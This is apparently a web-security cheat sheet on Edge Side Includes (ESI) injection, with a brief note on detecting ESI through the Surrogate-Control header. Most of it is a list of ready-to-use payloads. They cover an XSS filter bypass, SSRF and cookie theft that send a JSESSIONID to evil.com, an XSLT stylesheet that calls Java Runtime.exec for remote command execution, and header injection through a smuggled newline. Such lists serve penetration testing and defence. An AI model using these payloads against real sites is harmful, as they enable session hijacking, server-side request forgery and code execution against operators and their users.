Skip to content

ESI

ESI Injections

How to Detect ESI

Check for the header "Surrogate-Control: content="ESI/1.0”, you are probably dealing with an ESI-enabled infrastructure.

However, most proxies and load balancers will remove this header from upstream before sending it down to the client. Some proxies also do not require any Surrogate-Control headers. Therefore, this is not a definitive way of identifying ESI use. Given the wide variety of feature selection in ESI implementations, no unique test can be performed to test for ESI injection. One would have to test various payloads and observe the side effects to properly identify ESI injectable endpoints. For example, ESI includes can be used to perform an SSRF to a server the attacker controls, but some implementations will require the host to be preemptively whitelisted.

Examples

Chrome XXS bypass:

x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>
>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>

SSRF:

GET /index.php?msg=<esi:include src="http://evil.com/poc.html" />

Bypass the HttpOnly Cookie Flag:

<esi:include src="http://evil.com/?cookie=$(HTTP_COOKIE{'JSESSIONID'})" />

XML Injection:

<esi:include src="http://host/poc.xml" dca="xslt" stylesheet="http://host/poc.xsl" />

XML Injection2:

<esi:include src="http://website.com/" stylesheet="http://evil.com/esi.xsl"></esi:include>

esi.xsl:

<?xml version="1.0" ?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:output method="xml" omit-xml-declaration="yes"/>
<xsl:template match="/"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime">
<root>
<xsl:variable name="cmd"><![CDATA[touch /tmp/pwned]]></xsl:variable>
<xsl:variable name="rtObj" select="rt:getRuntime()"/>
<xsl:variable name="process" select="rt:exec($rtObj, $cmd)"/>
Process: <xsl:value-of select="$process"/>
Command: <xsl:value-of select="$cmd"/>
</root>
</xsl:template>
</xsl:stylesheet>

Header Injection:

<esi:include src="/page_from_another_host.htm">
<esi:request_header name="User-Agent" value="12345
Host: anotherhost.com"/>
</esi:include>